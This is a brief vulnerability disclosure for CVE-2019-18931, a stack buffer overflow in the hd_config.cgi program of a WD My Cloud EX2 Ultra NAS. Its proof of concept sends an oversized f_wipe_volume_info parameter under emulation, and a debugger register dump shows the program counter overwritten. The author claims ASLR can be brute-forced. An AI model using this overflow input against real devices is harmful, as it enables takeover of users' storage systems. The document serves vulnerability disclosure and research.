CVE-2019-18931
Information
Target : WD My Cloud EX2 Ultra
Version : 2.31.195
Proof of Concept
$ qemu-arm-static -g 1234 -E "QUERY_STRING=cmd=cgi_FMT_Wipe_DiskMGR&f_wipe_volume_info=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&form=" -E REQUEST_METHOD=GET ~/afl/newpj3/targets/_hd_config.cgi/hd_config.cgi
gdb-peda$ info registers
r0 0x9 0x9
r1 0x0 0x0
r2 0xf655d6b8 0xf655d6b8
r3 0xf655cd50 0xf655cd50
r4 0x61616161 0x61616161
r5 0x61616161 0x61616161
r6 0x61616161 0x61616161
r7 0x61616161 0x61616161
r8 0x0 0x0
r9 0xf67bf0f4 0xf67bf0f4
r10 0xf67fe000 0xf67fe000
r11 0x0 0x0
r12 0x3e 0x3e
sp 0xf6fff1b8 0xf6fff1b8
lr 0x61616161 0x61616161
pc 0x61616160 0x61616160
cpsr 0x20000030 0x20000030
Exploit
It is possible to control the PC register and bypass ASLR by doing brute force attack.
I will disclose an exploit code soon!